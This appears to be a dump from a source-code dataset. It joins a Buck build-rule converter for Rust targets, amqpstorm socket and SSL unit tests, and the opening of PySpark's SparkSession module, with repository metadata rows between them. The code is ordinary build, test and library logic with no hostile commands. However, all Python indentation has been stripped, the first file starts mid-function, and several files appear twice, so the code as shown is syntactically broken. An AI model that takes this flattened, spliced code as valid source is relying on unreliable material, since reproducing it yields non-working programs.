# they already add them
libgcc = ThirdPartyRuleTarget('libgcc', 'stdc++')
if libgcc not in deps:
deps.append(libgcc)
return deps, rules
def convert(self,
base_path,
name,
srcs=None,
deps=None,
rustc_flags=None,
features=None,
crate=None,
link_style=None,
preferred_linkage=None,
visibility=None,
external_deps=None,
crate_root=None,
linker_flags=None,
framework=True,
unittests=True,
proc_macro=False,
tests=None,
test_features=None,
test_rustc_flags=None,
test_link_style=None,
test_linker_flags=None,
test_srcs=None,
test_deps=None,
test_external_deps=None,
allocator=None,
**kwargs):
extra_rules = []
dependencies = []
attributes = collections.OrderedDict()
attributes['name'] = name
attributes['srcs'] = self.convert_source_list(base_path, srcs or [])
attributes['features'] = features or []
if not crate_root and not self.is_test():
# Compute a crate_root if one wasn't specified. We'll need this
# to pass onto the generated test rule.
topsrc_options = ((crate or name) + '.rs',)
if self.get_fbconfig_rule_type() == 'rust_binary':
topsrc_options += ('main.rs',)
if self.get_fbconfig_rule_type() == 'rust_library':
topsrc_options += ('lib.rs',)
topsrc = []
for s in srcs or []:
if s.startswith(':'):
continue
if os.path.basename(s) in topsrc_options:
topsrc.append(s)
# Not sure what to do about too many or not enough crate roots
if len(topsrc) == 1:
crate_root = topsrc[0]
if crate_root:
attributes['crate_root'] = crate_root
if rustc_flags:
attributes['rustc_flags'] = rustc_flags
if crate:
attributes['crate'] = crate
attributes['default_platform'] = platform_utils.get_buck_platform_for_base_path(base_path)
if self.is_binary():
platform = self.get_platform(base_path)
if not link_style:
link_style = self.get_link_style()
attributes['link_style'] = link_style
ldflags = self.get_ldflags(
base_path,
name,
self.get_fbconfig_rule_type(),
binary=True,
build_info=True,
platform=platform)
attributes['linker_flags'] = ldflags + (linker_flags or [])
# Add the Rust build info lib to deps.
rust_build_info, rust_build_info_rules = (
self.create_rust_build_info_rule(
base_path,
name,
crate,
self.get_fbconfig_rule_type(),
platform,
visibility))
dependencies.append(rust_build_info)
extra_rules.extend(rust_build_info_rules)
else:
if proc_macro:
attributes['proc_macro'] = proc_macro
if preferred_linkage:
attributes['preferred_linkage'] = preferred_linkage
if rustc_flags:
attributes['rustc_flags'] = rustc_flags
if visibility:
attributes['visibility'] = visibility
# Translate dependencies.
for dep in deps or []:
dependencies.append(target.parse_target(dep, base_path=base_path))
# Translate external dependencies.
for dep in external_deps or []:
dependencies.append(self.normalize_external_dep(dep))
if not tests:
tests = []
# Add test rule for all library/binary rules
# It has the same set of srcs and dependencies as the base rule,
# but also allows additional test srcs, deps and external deps.
# test_features and test_rustc_flags override the base rule keys,
# if present.
if not self.is_test() and unittests:
test, r = self.create_rust_test_rule(
base_path,
dependencies,
attributes,
test_srcs,
test_deps,
test_external_deps,
test_rustc_flags,
test_features,
test_link_style,
test_linker_flags,
allocator,
visibility,
)
tests.append(':' + test.attributes['name'])
extra_rules.append(test)
extra_rules.extend(r)
attributes['tests'] = tests
if self.is_test():
attributes['framework'] = framework
# Add in binary-specific link deps.
# Do this after creating the test rule, so that it doesn't pick this
# up as well (it will add its own binary deps as needed)
if self.is_binary():
d, r = self.get_rust_binary_deps(
base_path,
name,
linker_flags,
allocator,
)
dependencies.extend(d)
extra_rules.extend(r)
# If any deps were specified, add them to the output attrs.
if dependencies:
attributes['deps'], attributes['platform_deps'] = (
self.format_all_deps(dependencies))
return [Rule(self.get_buck_rule_type(), attributes)] + extra_rules
def create_rust_test_rule(
self,
base_path,
dependencies,
attributes,
test_srcs,
test_deps,
test_external_deps,
test_rustc_flags,
test_features,
test_link_style,
test_linker_flags,
allocator,
visibility):
"""
Construct a rust_test rule corresponding to a rust_library or
rust_binary rule so that internal unit tests can be run.
"""
rules = []
test_attributes = collections.OrderedDict()
name = '%s-unittest' % attributes['name']
test_attributes['name'] = name
if visibility is not None:
test_attributes['visibility'] = visibility
# Regardless of the base rule type, the resulting unit test is always
# an executable which needs to have buildinfo.
ldflags = self.get_ldflags(
base_path,
name,
self.get_fbconfig_rule_type(),
binary=True,
strip_mode=None,
build_info=True,
platform=self.get_platform(base_path))
test_attributes['default_platform'] = platform_utils.get_buck_platform_for_base_path(base_path)
if 'crate' in attributes:
test_attributes['crate'] = '%s_unittest' % attributes['crate']
if 'crate_root' in attributes:
test_attributes['crate_root'] = attributes['crate_root']
if test_rustc_flags:
test_attributes['rustc_flags'] = test_rustc_flags
elif 'rustc_flags' in attributes:
test_attributes['rustc_flags'] = attributes['rustc_flags']
if test_features:
test_attributes['features'] = test_features
elif 'features' in attributes:
test_attributes['features'] = attributes['features']
link_style = self.get_link_style()
if test_link_style:
link_style = test_link_style
elif 'link_style' in attributes:
link_style = attributes['link_style']
test_attributes['link_style'] = link_style
test_attributes['linker_flags'] = ldflags + (test_linker_flags or [])
test_attributes['srcs'] = list(attributes.get('srcs', []))
if test_srcs:
test_attributes['srcs'] += (
self.convert_source_list(base_path, test_srcs))
deps = []
deps.extend(dependencies)
for dep in test_deps or []:
deps.append(target.parse_target(dep, base_path=base_path))
for dep in test_external_deps or []:
deps.append(self.normalize_external_dep(dep))
d, r = self.get_rust_binary_deps(
base_path,
name,
test_attributes['linker_flags'],
allocator,
)
deps.extend(d)
rules.extend(r)
test_attributes['deps'], test_attributes['platform_deps'] = (
self.format_all_deps(deps))
return Rule('rust_test', test_attributes), rules
def create_rust_build_info_rule(
self,
base_path,
name,
crate,
rule_type,
platform,
visibility):
"""
Create rules to generate a Rust library with build info.
"""
rules = []
info = (
self.get_build_info(
base_path,
name,
rule_type,
platform))
template = """
#[derive(Debug, Copy, Clone, Eq, PartialEq, Ord, PartialOrd, Hash)]
pub struct BuildInfo {
"""
# Construct a template
for k, v in info.items():
if isinstance(v, int):
type = "u64"
else:
type = "&'static str"
template += " pub %s: %s,\n" % (k, type)
template += "}\n"
template += """
pub const BUILDINFO: BuildInfo = BuildInfo {
"""
for k, v in info.items():
if isinstance(v, int):
template += " %s: %s,\n" % (k, v)
else:
template += " %s: \"%s\",\n" % (k, v)
template += "};\n"
# Setup a rule to generate the build info Rust file.
source_name = name + "-rust-build-info"
source_attrs = collections.OrderedDict()
source_attrs['name'] = source_name
if visibility is not None:
source_attrs['visibility'] = visibility
source_attrs['out'] = 'lib.rs'
source_attrs['cmd'] = (
'mkdir -p `dirname $OUT` && echo {0} > $OUT'
.format(pipes.quote(template)))
rules.append(Rule('genrule', source_attrs))
# Setup a rule to compile the build info C file into a library.
lib_name = name + '-rust-build-info-lib'
lib_attrs = collections.OrderedDict()
lib_attrs['name'] = lib_name
if visibility is not None:
lib_attrs['visibility'] = visibility
lib_attrs['crate'] = (crate or name) + "_build_info"
lib_attrs['preferred_linkage'] = 'static'
lib_attrs['srcs'] = [':' + source_name]
lib_attrs['default_platform'] = platform_utils.get_buck_platform_for_base_path(base_path)
rules.append(Rule('rust_library', lib_attrs))
return RootRuleTarget(base_path, lib_name), rules
| 32.181614 | 103 | 0.554031 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import collections
import pipes
import os.path
macro_root = read_config('fbcode', 'macro_lib', '//macro_lib')
include_defs("{}/convert/base.py".format(macro_root), "base")
include_defs("{}/rule.py".format(macro_root))
include_defs("{}/fbcode_target.py".format(macro_root), "target")
load("{}:fbcode_target.py".format(macro_root),
"RootRuleTarget",
"RuleTarget",
"ThirdPartyRuleTarget")
load("@fbcode_macros//build_defs:platform_utils.bzl", "platform_utils")
class RustConverter(base.Converter):
def __init__(self, context, rule_type):
super(RustConverter, self).__init__(context)
self._rule_type = rule_type
def get_fbconfig_rule_type(self):
return self._rule_type
def get_buck_rule_type(self):
if self._rule_type == 'rust_unittest':
return 'rust_test'
else:
return self._rule_type
def is_binary(self):
return self.get_fbconfig_rule_type() in \
('rust_binary', 'rust_unittest',)
def is_test(self):
return self.get_fbconfig_rule_type() in ('rust_unittest',)
def is_deployable(self):
return self.is_binary()
def get_allowed_args(self):
ok = set([
'name',
'srcs',
'deps',
'external_deps',
'features',
'rustc_flags',
'crate',
'crate_root',
])
if not self.is_test():
ok |= set([
'unittests',
'tests',
'test_deps',
'test_external_deps',
'test_srcs',
'test_features',
'test_rustc_flags',
'test_link_style',
])
else:
ok.update(['framework'])
if self.is_binary():
ok |= set(['linker_flags', 'link_style', 'allocator'])
else:
ok |= set(['preferred_linkage', 'proc_macro'])
return ok
def get_rust_binary_deps(self, base_path, name, linker_flags, allocator):
deps = []
rules = []
allocator = self.get_allocator(allocator)
d, r = self.get_binary_link_deps(
base_path,
name,
linker_flags,
allocator,
)
deps.extend(d)
rules.extend(r)
libc = ThirdPartyRuleTarget('glibc', 'c')
if libc not in deps:
deps.append(libc)
libgcc = ThirdPartyRuleTarget('libgcc', 'stdc++')
if libgcc not in deps:
deps.append(libgcc)
return deps, rules
def convert(self,
base_path,
name,
srcs=None,
deps=None,
rustc_flags=None,
features=None,
crate=None,
link_style=None,
preferred_linkage=None,
visibility=None,
external_deps=None,
crate_root=None,
linker_flags=None,
framework=True,
unittests=True,
proc_macro=False,
tests=None,
test_features=None,
test_rustc_flags=None,
test_link_style=None,
test_linker_flags=None,
test_srcs=None,
test_deps=None,
test_external_deps=None,
allocator=None,
**kwargs):
extra_rules = []
dependencies = []
attributes = collections.OrderedDict()
attributes['name'] = name
attributes['srcs'] = self.convert_source_list(base_path, srcs or [])
attributes['features'] = features or []
if not crate_root and not self.is_test():
topsrc_options = ((crate or name) + '.rs',)
if self.get_fbconfig_rule_type() == 'rust_binary':
topsrc_options += ('main.rs',)
if self.get_fbconfig_rule_type() == 'rust_library':
topsrc_options += ('lib.rs',)
topsrc = []
for s in srcs or []:
if s.startswith(':'):
continue
if os.path.basename(s) in topsrc_options:
topsrc.append(s)
if len(topsrc) == 1:
crate_root = topsrc[0]
if crate_root:
attributes['crate_root'] = crate_root
if rustc_flags:
attributes['rustc_flags'] = rustc_flags
if crate:
attributes['crate'] = crate
attributes['default_platform'] = platform_utils.get_buck_platform_for_base_path(base_path)
if self.is_binary():
platform = self.get_platform(base_path)
if not link_style:
link_style = self.get_link_style()
attributes['link_style'] = link_style
ldflags = self.get_ldflags(
base_path,
name,
self.get_fbconfig_rule_type(),
binary=True,
build_info=True,
platform=platform)
attributes['linker_flags'] = ldflags + (linker_flags or [])
rust_build_info, rust_build_info_rules = (
self.create_rust_build_info_rule(
base_path,
name,
crate,
self.get_fbconfig_rule_type(),
platform,
visibility))
dependencies.append(rust_build_info)
extra_rules.extend(rust_build_info_rules)
else:
if proc_macro:
attributes['proc_macro'] = proc_macro
if preferred_linkage:
attributes['preferred_linkage'] = preferred_linkage
if rustc_flags:
attributes['rustc_flags'] = rustc_flags
if visibility:
attributes['visibility'] = visibility
for dep in deps or []:
dependencies.append(target.parse_target(dep, base_path=base_path))
for dep in external_deps or []:
dependencies.append(self.normalize_external_dep(dep))
if not tests:
tests = []
if not self.is_test() and unittests:
test, r = self.create_rust_test_rule(
base_path,
dependencies,
attributes,
test_srcs,
test_deps,
test_external_deps,
test_rustc_flags,
test_features,
test_link_style,
test_linker_flags,
allocator,
visibility,
)
tests.append(':' + test.attributes['name'])
extra_rules.append(test)
extra_rules.extend(r)
attributes['tests'] = tests
if self.is_test():
attributes['framework'] = framework
# up as well (it will add its own binary deps as needed)
if self.is_binary():
d, r = self.get_rust_binary_deps(
base_path,
name,
linker_flags,
allocator,
)
dependencies.extend(d)
extra_rules.extend(r)
# If any deps were specified, add them to the output attrs.
if dependencies:
attributes['deps'], attributes['platform_deps'] = (
self.format_all_deps(dependencies))
return [Rule(self.get_buck_rule_type(), attributes)] + extra_rules
def create_rust_test_rule(
self,
base_path,
dependencies,
attributes,
test_srcs,
test_deps,
test_external_deps,
test_rustc_flags,
test_features,
test_link_style,
test_linker_flags,
allocator,
visibility):
rules = []
test_attributes = collections.OrderedDict()
name = '%s-unittest' % attributes['name']
test_attributes['name'] = name
if visibility is not None:
test_attributes['visibility'] = visibility
# Regardless of the base rule type, the resulting unit test is always
# an executable which needs to have buildinfo.
ldflags = self.get_ldflags(
base_path,
name,
self.get_fbconfig_rule_type(),
binary=True,
strip_mode=None,
build_info=True,
platform=self.get_platform(base_path))
test_attributes['default_platform'] = platform_utils.get_buck_platform_for_base_path(base_path)
if 'crate' in attributes:
test_attributes['crate'] = '%s_unittest' % attributes['crate']
if 'crate_root' in attributes:
test_attributes['crate_root'] = attributes['crate_root']
if test_rustc_flags:
test_attributes['rustc_flags'] = test_rustc_flags
elif 'rustc_flags' in attributes:
test_attributes['rustc_flags'] = attributes['rustc_flags']
if test_features:
test_attributes['features'] = test_features
elif 'features' in attributes:
test_attributes['features'] = attributes['features']
link_style = self.get_link_style()
if test_link_style:
link_style = test_link_style
elif 'link_style' in attributes:
link_style = attributes['link_style']
test_attributes['link_style'] = link_style
test_attributes['linker_flags'] = ldflags + (test_linker_flags or [])
test_attributes['srcs'] = list(attributes.get('srcs', []))
if test_srcs:
test_attributes['srcs'] += (
self.convert_source_list(base_path, test_srcs))
deps = []
deps.extend(dependencies)
for dep in test_deps or []:
deps.append(target.parse_target(dep, base_path=base_path))
for dep in test_external_deps or []:
deps.append(self.normalize_external_dep(dep))
d, r = self.get_rust_binary_deps(
base_path,
name,
test_attributes['linker_flags'],
allocator,
)
deps.extend(d)
rules.extend(r)
test_attributes['deps'], test_attributes['platform_deps'] = (
self.format_all_deps(deps))
return Rule('rust_test', test_attributes), rules
def create_rust_build_info_rule(
self,
base_path,
name,
crate,
rule_type,
platform,
visibility):
rules = []
info = (
self.get_build_info(
base_path,
name,
rule_type,
platform))
template = """
#[derive(Debug, Copy, Clone, Eq, PartialEq, Ord, PartialOrd, Hash)]
pub struct BuildInfo {
"""
# Construct a template
for k, v in info.items():
if isinstance(v, int):
type = "u64"
else:
type = "&'static str"
template += " pub %s: %s,\n" % (k, type)
template += "}\n"
template += """
pub const BUILDINFO: BuildInfo = BuildInfo {
"""
for k, v in info.items():
if isinstance(v, int):
template += " %s: %s,\n" % (k, v)
else:
template += " %s: \"%s\",\n" % (k, v)
template += "};\n"
source_name = name + "-rust-build-info"
source_attrs = collections.OrderedDict()
source_attrs['name'] = source_name
if visibility is not None:
source_attrs['visibility'] = visibility
source_attrs['out'] = 'lib.rs'
source_attrs['cmd'] = (
'mkdir -p `dirname $OUT` && echo {0} > $OUT'
.format(pipes.quote(template)))
rules.append(Rule('genrule', source_attrs))
lib_name = name + '-rust-build-info-lib'
lib_attrs = collections.OrderedDict()
lib_attrs['name'] = lib_name
if visibility is not None:
lib_attrs['visibility'] = visibility
lib_attrs['crate'] = (crate or name) + "_build_info"
lib_attrs['preferred_linkage'] = 'static'
lib_attrs['srcs'] = [':' + source_name]
lib_attrs['default_platform'] = platform_utils.get_buck_platform_for_base_path(base_path)
rules.append(Rule('rust_library', lib_attrs))
return RootRuleTarget(base_path, lib_name), rules
| true | true |
1c3c76f7f6a1c8412b949d00c997a21efe94fb01 | 6,174 | py | Python | amqpstorm/tests/unit/io/test_io.py | ZygusPatryk/amqpstorm | 0f3ad84a529f12769d34638a88c38f3055cb05cd | [
"MIT"
] | 140 | 2016-06-07T18:53:57.000Z | 2022-03-23T01:50:15.000Z | amqpstorm/tests/unit/io/test_io.py | ZygusPatryk/amqpstorm | 0f3ad84a529f12769d34638a88c38f3055cb05cd | [
"MIT"
] | 85 | 2016-04-11T23:32:32.000Z | 2022-03-19T07:21:21.000Z | amqpstorm/tests/unit/io/test_io.py | ZygusPatryk/amqpstorm | 0f3ad84a529f12769d34638a88c38f3055cb05cd | [
"MIT"
] | 38 | 2016-04-20T20:21:13.000Z | 2022-03-23T05:31:58.000Z | import socket
import ssl
import mock
import amqpstorm.io
from amqpstorm.exception import AMQPConnectionError
from amqpstorm.io import IO
from amqpstorm.tests.utility import FakeConnection
from amqpstorm.tests.utility import TestFramework
class IOTests(TestFramework):
def test_io_socket_close(self):
connection = FakeConnection()
io = IO(connection.parameters)
io.socket = mock.Mock(name='socket', spec=socket.socket)
io.close()
self.assertIsNone(io.socket)
def test_io_use_ssl_false(self):
connection = FakeConnection()
io = IO(connection.parameters)
self.assertFalse(io.use_ssl)
def test_io_use_ssl_true(self):
connection = FakeConnection()
connection.parameters['ssl'] = True
io = IO(connection.parameters)
self.assertTrue(io.use_ssl)
def test_io_create_socket(self):
connection = FakeConnection()
io = IO(connection.parameters)
self.assertFalse(io.use_ssl)
addresses = io._get_socket_addresses()
sock_address_tuple = addresses[0]
sock = io._create_socket(socket_family=sock_address_tuple[0])
if hasattr(socket, 'socket'):
self.assertIsInstance(sock, socket.socket)
def test_io_create_ssl_socket(self):
connection = FakeConnection()
connection.parameters['ssl'] = True
io = IO(connection.parameters)
self.assertTrue(io.use_ssl)
addresses = io._get_socket_addresses()
sock_address_tuple = addresses[0]
sock = io._create_socket(socket_family=sock_address_tuple[0])
if hasattr(socket, 'socket'):
self.assertIsInstance(sock, socket.socket)
if hasattr(ssl, 'SSLSocket'):
self.assertIsInstance(sock, ssl.SSLSocket)
def test_io_get_socket_address(self):
connection = FakeConnection()
connection.parameters['hostname'] = '127.0.0.1'
connection.parameters['port'] = 5672
io = IO(connection.parameters)
addresses = io._get_socket_addresses()
sock_address_tuple = addresses[0]
self.assertEqual(sock_address_tuple[4],
('127.0.0.1', 5672))
def test_io_simple_receive(self):
connection = FakeConnection()
io = IO(connection.parameters)
self.assertFalse(io.use_ssl)
io.socket = mock.Mock(name='socket', spec=socket.socket)
io.socket.recv.return_value = '12345'
self.assertEqual(io._receive(), '12345')
def test_io_simple_ssl_receive(self):
connection = FakeConnection()
connection.parameters['ssl'] = True
io = IO(connection.parameters)
self.assertTrue(io.use_ssl)
if hasattr(ssl, 'SSLObject'):
io.socket = mock.Mock(name='socket', spec=ssl.SSLObject)
elif hasattr(ssl, 'SSLSocket'):
io.socket = mock.Mock(name='socket', spec=ssl.SSLSocket)
io.socket.read.return_value = '12345'
self.assertEqual(io._receive(), '12345')
def test_io_simple_send_zero_bytes_sent(self):
connection = FakeConnection()
io = IO(connection.parameters, exceptions=connection.exceptions)
io.socket = mock.Mock(name='socket', spec=socket.socket)
io.socket.send.return_value = 0
io.write_to_socket(self.message)
self.assertRaisesRegex(
AMQPConnectionError,
'connection/socket error',
connection.check_for_errors
)
def test_io_set_ssl_context(self):
connection = FakeConnection()
connection.parameters['ssl_options'] = {
'context': ssl.create_default_context(),
'server_hostname': 'localhost',
}
io = IO(connection.parameters)
self.assertTrue(io._ssl_wrap_socket(socket.socket()))
def test_io_set_ssl_verify_req(self):
connection = FakeConnection()
connection.parameters['ssl_options'] = {
'verify_mode': 'required'
}
io = IO(connection.parameters)
sock = io._ssl_wrap_socket(socket.socket())
self.assertEqual(sock.context.verify_mode, ssl.CERT_REQUIRED)
def test_io_set_ssl_context_no_hostname_provided(self):
connection = FakeConnection()
connection.parameters['ssl_options'] = {
'context': ssl.create_default_context(),
}
io = IO(connection.parameters)
self.assertRaises(ValueError, io._ssl_wrap_socket, socket.socket())
def test_io_has_ipv6(self):
restore_func = socket.getaddrinfo
def mock_getaddrinfo(hostname, port, family, socktype):
return [hostname, port, family, socktype]
try:
amqpstorm.io.socket.getaddrinfo = mock_getaddrinfo
connection = FakeConnection()
connection.parameters['hostname'] = 'localhost'
connection.parameters['port'] = 1234
parameters = connection.parameters
io = IO(parameters)
result = io._get_socket_addresses()
self.assertEqual(result[2], socket.AF_UNSPEC)
self.assertEqual(result[3], socket.SOCK_STREAM)
finally:
amqpstorm.io.socket.getaddrinfo = restore_func
def test_io_has_ipv6_is_false(self):
restore_func = socket.getaddrinfo
restore_has_ipv6 = amqpstorm.io.socket.has_ipv6
def mock_getaddrinfo(hostname, port, family, socktype):
return [hostname, port, family, socktype]
try:
amqpstorm.io.socket.getaddrinfo = mock_getaddrinfo
amqpstorm.io.socket.has_ipv6 = False
connection = FakeConnection()
connection.parameters['hostname'] = 'localhost'
connection.parameters['port'] = 1234
parameters = connection.parameters
io = IO(parameters)
result = io._get_socket_addresses()
self.assertEqual(result[2], socket.AF_INET)
self.assertEqual(result[3], socket.SOCK_STREAM)
finally:
amqpstorm.io.socket.getaddrinfo = restore_func
amqpstorm.io.socket.has_ipv6 = restore_has_ipv6
| 32.840426 | 75 | 0.645449 | import socket
import ssl
import mock
import amqpstorm.io
from amqpstorm.exception import AMQPConnectionError
from amqpstorm.io import IO
from amqpstorm.tests.utility import FakeConnection
from amqpstorm.tests.utility import TestFramework
class IOTests(TestFramework):
def test_io_socket_close(self):
connection = FakeConnection()
io = IO(connection.parameters)
io.socket = mock.Mock(name='socket', spec=socket.socket)
io.close()
self.assertIsNone(io.socket)
def test_io_use_ssl_false(self):
connection = FakeConnection()
io = IO(connection.parameters)
self.assertFalse(io.use_ssl)
def test_io_use_ssl_true(self):
connection = FakeConnection()
connection.parameters['ssl'] = True
io = IO(connection.parameters)
self.assertTrue(io.use_ssl)
def test_io_create_socket(self):
connection = FakeConnection()
io = IO(connection.parameters)
self.assertFalse(io.use_ssl)
addresses = io._get_socket_addresses()
sock_address_tuple = addresses[0]
sock = io._create_socket(socket_family=sock_address_tuple[0])
if hasattr(socket, 'socket'):
self.assertIsInstance(sock, socket.socket)
def test_io_create_ssl_socket(self):
connection = FakeConnection()
connection.parameters['ssl'] = True
io = IO(connection.parameters)
self.assertTrue(io.use_ssl)
addresses = io._get_socket_addresses()
sock_address_tuple = addresses[0]
sock = io._create_socket(socket_family=sock_address_tuple[0])
if hasattr(socket, 'socket'):
self.assertIsInstance(sock, socket.socket)
if hasattr(ssl, 'SSLSocket'):
self.assertIsInstance(sock, ssl.SSLSocket)
def test_io_get_socket_address(self):
connection = FakeConnection()
connection.parameters['hostname'] = '127.0.0.1'
connection.parameters['port'] = 5672
io = IO(connection.parameters)
addresses = io._get_socket_addresses()
sock_address_tuple = addresses[0]
self.assertEqual(sock_address_tuple[4],
('127.0.0.1', 5672))
def test_io_simple_receive(self):
connection = FakeConnection()
io = IO(connection.parameters)
self.assertFalse(io.use_ssl)
io.socket = mock.Mock(name='socket', spec=socket.socket)
io.socket.recv.return_value = '12345'
self.assertEqual(io._receive(), '12345')
def test_io_simple_ssl_receive(self):
connection = FakeConnection()
connection.parameters['ssl'] = True
io = IO(connection.parameters)
self.assertTrue(io.use_ssl)
if hasattr(ssl, 'SSLObject'):
io.socket = mock.Mock(name='socket', spec=ssl.SSLObject)
elif hasattr(ssl, 'SSLSocket'):
io.socket = mock.Mock(name='socket', spec=ssl.SSLSocket)
io.socket.read.return_value = '12345'
self.assertEqual(io._receive(), '12345')
def test_io_simple_send_zero_bytes_sent(self):
connection = FakeConnection()
io = IO(connection.parameters, exceptions=connection.exceptions)
io.socket = mock.Mock(name='socket', spec=socket.socket)
io.socket.send.return_value = 0
io.write_to_socket(self.message)
self.assertRaisesRegex(
AMQPConnectionError,
'connection/socket error',
connection.check_for_errors
)
def test_io_set_ssl_context(self):
connection = FakeConnection()
connection.parameters['ssl_options'] = {
'context': ssl.create_default_context(),
'server_hostname': 'localhost',
}
io = IO(connection.parameters)
self.assertTrue(io._ssl_wrap_socket(socket.socket()))
def test_io_set_ssl_verify_req(self):
connection = FakeConnection()
connection.parameters['ssl_options'] = {
'verify_mode': 'required'
}
io = IO(connection.parameters)
sock = io._ssl_wrap_socket(socket.socket())
self.assertEqual(sock.context.verify_mode, ssl.CERT_REQUIRED)
def test_io_set_ssl_context_no_hostname_provided(self):
connection = FakeConnection()
connection.parameters['ssl_options'] = {
'context': ssl.create_default_context(),
}
io = IO(connection.parameters)
self.assertRaises(ValueError, io._ssl_wrap_socket, socket.socket())
def test_io_has_ipv6(self):
restore_func = socket.getaddrinfo
def mock_getaddrinfo(hostname, port, family, socktype):
return [hostname, port, family, socktype]
try:
amqpstorm.io.socket.getaddrinfo = mock_getaddrinfo
connection = FakeConnection()
connection.parameters['hostname'] = 'localhost'
connection.parameters['port'] = 1234
parameters = connection.parameters
io = IO(parameters)
result = io._get_socket_addresses()
self.assertEqual(result[2], socket.AF_UNSPEC)
self.assertEqual(result[3], socket.SOCK_STREAM)
finally:
amqpstorm.io.socket.getaddrinfo = restore_func
def test_io_has_ipv6_is_false(self):
restore_func = socket.getaddrinfo
restore_has_ipv6 = amqpstorm.io.socket.has_ipv6
def mock_getaddrinfo(hostname, port, family, socktype):
return [hostname, port, family, socktype]
try:
amqpstorm.io.socket.getaddrinfo = mock_getaddrinfo
amqpstorm.io.socket.has_ipv6 = False
connection = FakeConnection()
connection.parameters['hostname'] = 'localhost'
connection.parameters['port'] = 1234
parameters = connection.parameters
io = IO(parameters)
result = io._get_socket_addresses()
self.assertEqual(result[2], socket.AF_INET)
self.assertEqual(result[3], socket.SOCK_STREAM)
finally:
amqpstorm.io.socket.getaddrinfo = restore_func
amqpstorm.io.socket.has_ipv6 = restore_has_ipv6
| true | true |
1c3c7778c7ee126389e43d7099e098533df4a200 | 37,802 | py | Python | python/pyspark/sql/session.py | zhouzach/spark | ad77b400da4089a2de74394e2b8aed813633025a | [
"BSD-2-Clause",
"Apache-2.0",
"CC0-1.0",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 4 | 2019-12-02T00:44:54.000Z | 2022-01-26T20:44:14.000Z | python/pyspark/sql/session.py | zhouzach/spark | ad77b400da4089a2de74394e2b8aed813633025a | [
"BSD-2-Clause",
"Apache-2.0",
"CC0-1.0",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 23 | 2019-11-25T10:56:33.000Z | 2022-02-16T01:07:16.000Z | python/pyspark/sql/session.py | zhouzach/spark | ad77b400da4089a2de74394e2b8aed813633025a | [
"BSD-2-Clause",
"Apache-2.0",
"CC0-1.0",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 3 | 2022-03-09T05:11:47.000Z | 2022-03-09T20:29:10.000Z | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import sys
import warnings
from functools import reduce
from threading import RLock
if sys.version >= '3':
basestring = unicode = str
xrange = range
else:
from itertools import izip as zip, imap as map
from pyspark import since
from pyspark.rdd import RDD, ignore_unicode_prefix
from pyspark.sql.conf import RuntimeConfig
from pyspark.sql.dataframe import DataFrame
from pyspark.sql.readwriter import DataFrameReader
from pyspark.sql.streaming import DataStreamReader
from pyspark.sql.types import Row, DataType, StringType, StructType, TimestampType, \
_make_type_verifier, _infer_schema, _has_nulltype, _merge_type, _create_converter, \
_parse_datatype_string
from pyspark.sql.utils import install_exception_handler
__all__ = ["SparkSession"]
def _monkey_patch_RDD(sparkSession):
def toDF(self, schema=None, sampleRatio=None):
"""
Converts current :class:`RDD` into a :class:`DataFrame`
This is a shorthand for ``spark.createDataFrame(rdd, schema, sampleRatio)``
:param schema: a :class:`pyspark.sql.types.StructType` or list of names of columns
:param samplingRatio: the sample ratio of rows used for inferring
:return: a DataFrame
>>> rdd.toDF().collect()
[Row(name=u'Alice', age=1)]
"""
return sparkSession.createDataFrame(self, schema, sampleRatio)
RDD.toDF = toDF
class SparkSession(object):
"""The entry point to programming Spark with the Dataset and DataFrame API.
A SparkSession can be used create :class:`DataFrame`, register :class:`DataFrame` as
tables, execute SQL over tables, cache tables, and read parquet files.
To create a SparkSession, use the following builder pattern:
>>> spark = SparkSession.builder \\
... .master("local") \\
... .appName("Word Count") \\
... .config("spark.some.config.option", "some-value") \\
... .getOrCreate()
.. autoattribute:: builder
:annotation:
"""
class Builder(object):
"""Builder for :class:`SparkSession`.
"""
_lock = RLock()
_options = {}
_sc = None
@since(2.0)
def config(self, key=None, value=None, conf=None):
"""Sets a config option. Options set using this method are automatically propagated to
both :class:`SparkConf` and :class:`SparkSession`'s own configuration.
For an existing SparkConf, use `conf` parameter.
>>> from pyspark.conf import SparkConf
>>> SparkSession.builder.config(conf=SparkConf())
<pyspark.sql.session...
For a (key, value) pair, you can omit parameter names.
>>> SparkSession.builder.config("spark.some.config.option", "some-value")
<pyspark.sql.session...
:param key: a key name string for configuration property
:param value: a value for configuration property
:param conf: an instance of :class:`SparkConf`
"""
with self._lock:
if conf is None:
self._options[key] = str(value)
else:
for (k, v) in conf.getAll():
self._options[k] = v
return self
@since(2.0)
def master(self, master):
"""Sets the Spark master URL to connect to, such as "local" to run locally, "local[4]"
to run locally with 4 cores, or "spark://master:7077" to run on a Spark standalone
cluster.
:param master: a url for spark master
"""
return self.config("spark.master", master)
@since(2.0)
def appName(self, name):
"""Sets a name for the application, which will be shown in the Spark web UI.
If no application name is set, a randomly generated name will be used.
:param name: an application name
"""
return self.config("spark.app.name", name)
@since(2.0)
def enableHiveSupport(self):
"""Enables Hive support, including connectivity to a persistent Hive metastore, support
for Hive SerDes, and Hive user-defined functions.
"""
return self.config("spark.sql.catalogImplementation", "hive")
def _sparkContext(self, sc):
with self._lock:
self._sc = sc
return self
@since(2.0)
def getOrCreate(self):
"""Gets an existing :class:`SparkSession` or, if there is no existing one, creates a
new one based on the options set in this builder.
This method first checks whether there is a valid global default SparkSession, and if
yes, return that one. If no valid global default SparkSession exists, the method
creates a new SparkSession and assigns the newly created SparkSession as the global
default.
>>> s1 = SparkSession.builder.config("k1", "v1").getOrCreate()
